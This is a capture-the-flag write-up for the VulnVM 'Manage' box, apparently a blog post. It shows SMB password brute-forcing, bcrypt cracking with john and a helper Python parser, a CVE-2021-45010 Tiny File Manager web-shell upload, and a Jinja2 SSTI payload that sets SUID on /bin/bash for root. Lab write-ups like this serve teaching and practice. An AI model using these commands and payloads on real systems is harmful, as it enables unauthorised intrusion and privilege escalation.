
VulnVM-Manage

1004 words · 5 min read
VulnVM Vulnvm Linux
Author: HYH
A technology enthusiast focused on cybersecurity, penetration testing and CTF challenges, who enjoys documenting hands-on experience, sharing tools and techniques, and keeps learning and growing.

Box Info

OS: Linux
Difficulty: Easy

Nmap

[root@kali] /home/kali/manage  
❯ nmap 192.168.55.66 -sV -A -p-

PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
139/tcp open  netbios-ssn Samba smbd 4
445/tcp open  netbios-ssn Samba smbd 4
MAC Address: 08:00:27:01:D6:2B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

Dirsearch

[root@kali] /home/kali/manage  
❯ dirsearch -u 'http://192.168.55.66'
  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://192.168.55.66/

[23:33:52] Scanning:                                                                                                                            
[23:33:53] 403 -   278B - /.php                                             
[23:33:55] 200 -   11KB - /admin.php                                        
[23:34:01] 200 -   10KB - /index.html                                       
[23:34:05] 403 -   278B - /server-status/                                   
[23:34:05] 403 -   278B - /server-status                                    
                                                                             
Task Completed                                                                                                    

There doesn't seem to be any SQL injection in admin.php, and its login can't be brute-forced either, so let's look at port 445.

SMB

First, gather information with enum4linux:

[root@kali] /home/kali/manage  
 enum4linux -a 192.168.55.66        

<skip>

 =================================( Share Enumeration on 192.168.55.66 )=================================
                                                                                                                                                
smbXcli_negprot_smb1_done: No compatible protocol selected by server.                                                                           

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        backup          Disk      
        IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
        nobody          Disk      Home Directories
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.55.66 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

<skip>


[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                                     
                                                                                                                                                
S-1-22-1-1000 Unix User\support (Local User)                                                                                                    
S-1-22-1-1001 Unix User\username (Local User)
S-1-22-1-1002 Unix User\noa (Local User)

[+] Enumerating users using SID S-1-5-21-2534225814-1784283865-2079386028 and logon username '', password ''                                    
                                                                                                                                                
S-1-5-21-2534225814-1784283865-2079386028-501 DEBIAN\nobody (Local User)                                                                        
S-1-5-21-2534225814-1784283865-2079386028-513 DEBIAN\None (Domain Group)
S-1-5-21-2534225814-1784283865-2079386028-1000 DEBIAN\noa (Local User)

<skip>

There is a user noa (it shows up under both the Unix and the Samba domain SID). Brute-force its SMB password with crackmapexec:

[root@kali] /home/kali/manage  
❯ crackmapexec smb 192.168.55.66 -u noa -p /usr/share/wordlists/rockyou.txt 

<skip>
SMB         192.168.55.66   445    DEBIAN           [-] DEBIAN\noa:rachel STATUS_LOGON_FAILURE 
SMB         192.168.55.66   445    DEBIAN           [-] DEBIAN\noa:tequiero STATUS_LOGON_FAILURE 
SMB         192.168.55.66   445    DEBIAN           [-] DEBIAN\noa:7777777 STATUS_LOGON_FAILURE 
SMB         192.168.55.66   445    DEBIAN           [-] DEBIAN\noa:cheese STATUS_LOGON_FAILURE 
SMB         192.168.55.66   445    DEBIAN           [+] DEBIAN\noa:159753 

Check share permissions with smbmap:

[root@kali] /home/kali/manage  
❯ smbmap -H 192.168.55.66 -u 'noa' -p '159753' 


    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 192.168.55.66:445       Name: 192.168.55.66             Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  READ ONLY       Printer Drivers
        backup                                                  READ ONLY
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.17.12-Debian)
        noa                                                     READ ONLY       Home Directories
[*] Closed 1 connections                                                                                           

The backup share holds a copy of the web root, including admin.php; download it:

[root@kali] /home/kali/manage  
❯ smbclient //192.168.55.66/backup -U noa
Password for [WORKGROUP\noa]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri May 30 10:20:32 2025
  ..                                  D        0  Fri May 30 08:28:10 2025
  index.html                          N    10701  Fri May 30 08:28:11 2025
  admin.php                           N   180701  Fri May 30 10:12:34 2025

                8200864 blocks of size 1024. 1793856 blocks available
smb: \> get admin.php 
getting file \admin.php of size 180701 as admin.php (58820.0 KiloBytes/sec) (average 58821.9 KiloBytes/sec)

Crack Pass

admin.php is Tiny File Manager. Its source contains the login username and a bcrypt password hash:

// Login user name and password
// Users: array('Username' => 'Password', 'Username2' => 'Password2', ...)
// Generate secure password hash - https://tinyfilemanager.github.io/docs/pwd.html
$auth_users = array(
    'eli' => '$2y$10$XIOjPqtS5yDbDqeUUPFJfe0u8kU4jN5Ltq/tfcrYKh.fjJ5uE25YC',
);

Save the hash to hash.txt and crack it with john:

[root@kali] /home/kali/manage  
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt    
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
poohbear         (?)     
1g 0:00:00:00 DONE (2025-05-31 02:59) 2.083g/s 300.0p/s 300.0c/s 300.0C/s shadow..sandra
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
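The hash.txt that john consumes above is not shown being built. As an added example (my code, not from the write-up), the following pulls every entry out of the $auth_users array of a Tiny File Manager admin.php, validates that each value really is a bcrypt string, and writes them in the user:hash form john expects. The admin.php text inside it is a constructed excerpt that reproduces only the array quoted above; the real file is about 180 KB.

```python
"""Added example, not code from the original write-up: pull the login entries
out of a Tiny File Manager admin.php and emit them as user:hash lines for john.
The admin.php text below is a constructed excerpt that reproduces only the
$auth_users block quoted above (the real file is about 180 KB)."""
import re

# Constructed excerpt of admin.php; only the $auth_users array is needed here.
SAMPLE_ADMIN_PHP = r"""<?php
// Login user name and password
// Users: array('Username' => 'Password', 'Username2' => 'Password2', ...)
// Generate secure password hash - https://tinyfilemanager.github.io/docs/pwd.html
$auth_users = array(
    'eli' => '$2y$10$XIOjPqtS5yDbDqeUUPFJfe0u8kU4jN5Ltq/tfcrYKh.fjJ5uE25YC',
);
"""

# The whole array literal, non-greedy up to the closing ");".
AUTH_USERS_RE = re.compile(r"\$auth_users\s*=\s*array\((?P<body>.*?)\);", re.S)
# One 'user' => 'value' entry inside that array.
ENTRY_RE = re.compile(r"'(?P<user>[^']+)'\s*=>\s*'(?P<value>[^']*)'")
# Modular-crypt bcrypt: $2[abxy]$ + two-digit cost + $ + 22-char salt + 31-char digest (60 chars).
BCRYPT_RE = re.compile(r"^\$2[abxy]\$(?P<cost>\d{2})\$[./A-Za-z0-9]{53}$")


def parse_auth_users(php_source: str) -> dict:
    """Return {username: stored value} from the $auth_users array."""
    block = AUTH_USERS_RE.search(php_source)
    if block is None:
        raise ValueError("no $auth_users array found")
    return {m.group("user"): m.group("value") for m in ENTRY_RE.finditer(block.group("body"))}


def bcrypt_cost(hash_str: str) -> int:
    """Cost parameter of a bcrypt string. Iterations are 2**cost, which is the
    'Cost 1 (iteration count)' figure john prints: 1024 for cost 10."""
    m = BCRYPT_RE.match(hash_str)
    if m is None:
        raise ValueError("not a bcrypt hash: %r" % hash_str)
    return int(m.group("cost"))


def john_lines(users: dict) -> list:
    """user:hash lines for john --format=bcrypt; non-bcrypt values are skipped."""
    return [f"{user}:{value}" for user, value in users.items() if BCRYPT_RE.match(value)]


def plaintext_entries(users: dict) -> dict:
    """Entries whose value is not a bcrypt hash. Worth reporting separately:
    a value stored in the clear is already a password, not something to crack."""
    return {user: value for user, value in users.items() if not BCRYPT_RE.match(value)}


if __name__ == "__main__":
    users = parse_auth_users(SAMPLE_ADMIN_PHP)
    lines = john_lines(users)
    with open("hash.txt", "w") as fh:
        fh.write("\n".join(lines) + "\n")
    for line in lines:
        cost = bcrypt_cost(line.split(":", 1)[1])
        print(line, "(cost %d, %d iterations)" % (cost, 2 ** cost))
    if plaintext_entries(users):
        print("plaintext entries:", plaintext_entries(users))
    # Then: john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

The cost check explains the "Cost 1 (iteration count) is 1024" line in john's output: cost 10 means 2^10 rounds per guess, which is why the run above manages only about 300 candidates per second on 8 threads and a wordlist attack is the only realistic option.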


CVE-2021-45010

The Tiny File Manager version is 2.4.3, which has a known authenticated RCE: CVE-2021-45010 lets a logged-in user upload a PHP file into the web root. With eli's cracked password, run the public exploit:

[root@kali] /home/kali/manage/tinyfilemanager-2.4.3-exploit (main) 
❯ python tiny_file_manager_exploit.py http://192.168.55.66/admin.php eli poohbear
 

CVE-2021-45010: Tiny File Manager <= 2.4.3 Authenticated RCE  Exploit.

Vulnerability discovered by Febin

Exploit Author: FEBIN

[+] Leak in the webroot direcory path to upload shell.
[+] WEBROOT found:  /var/www/html
[+] Trying to upload pwn_1417832321089569280.php to /var/www/html directory...
{"status":"success","info":"file upload successful"}
[+] Got Success response. Files seems to be uploaded successfully.
[+] Try to access the shell at http://192.168.55.66/pwn_1417832321089569280.php
[-] File not uploaded...
Exited.


The exploit's final check reports the file as not uploaded, but the upload request itself returned success. From the uploaded web shell, get a reverse shell as www-data, then look in /opt, where noa's password sits in a file owned by www-data:

www-data@debian:/opt$ ls -al
total 20
drwxr-xr-x  3 root     root     4096 May 30 13:28 .
drwxr-xr-x 19 root     root     4096 Mar  4 15:59 ..
drwxr-xr-x  8 root     root     4096 Mar  4 16:06 VBoxGuestAdditions-7.0.20
-rw-------  1 root     root     2611 May 30 13:28 chatbot.py
-rw-r--r--  1 www-data www-data   17 May 30 11:08 password.txt
www-data@debian:/opt$ cat password.txt 
noa:0ovYDGR0.e17
www-data@debian:/opt$ 

Root

Check sudo rights:

noa@debian:/opt$ sudo -l
Matching Defaults entries for noa on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User noa may run the following commands on debian:
    (root) NOPASSWD: /usr/bin/python3 /opt/chatbot.py

We can't read the source (chatbot.py is mode 600 and owned by root), so just run it; the idea was to expose the internal port with socat. Two things to note in the output below: because of the `&&`, socat would only start once the Flask process exits, and the app binds to 0.0.0.0 anyway, so port 5000 is reachable from the attacking machine without any forwarding (the request logged from 192.168.55.4 arrives directly). Debug mode is also on and the Werkzeug debugger PIN is printed to the console, which would be a second route to code execution; it is not needed here.

noa@debian:/tmp$ sudo /usr/bin/python3 /opt/chatbot.py && ./socat TCP-LISTEN:5000,fork TCP:127.0.0.1:5000
 * Serving Flask app 'chatbot'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:5000
 * Running on http://127.0.0.1:5000
Press CTRL+C to quit
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 584-498-758
192.168.55.4 - - [31/May/2025 03:10:35] "GET / HTTP/1.1" 200 -
192.168.55.4 - - [31/May/2025 03:10:35] "GET /favicon.ico HTTP/1.1" 404 -


A textbook SSTI (server-side template injection): the chatbot renders our message as a Jinja2 template. Because the app runs as root through sudo, the payload sets the SUID bit on /bin/bash; `bash -p` then gives a root shell:

{{lipsum.__globals__.__getitem__('os').popen('chmod +s /bin/bash').read()}}


Summary

User: brute-force noa's SMB password, pull admin.php from the backup share, crack the bcrypt hash in its source, use that login to exploit Tiny File Manager 2.4.3 (CVE-2021-45010) for a web shell as www-data, then read noa's password from /opt/password.txt.

Root: a Python (Flask) service that noa may start as root via sudo; it listens on port 5000 (bound to 0.0.0.0, so the socat forward is not strictly needed) and has an unfiltered SSTI, which gives command execution as root.
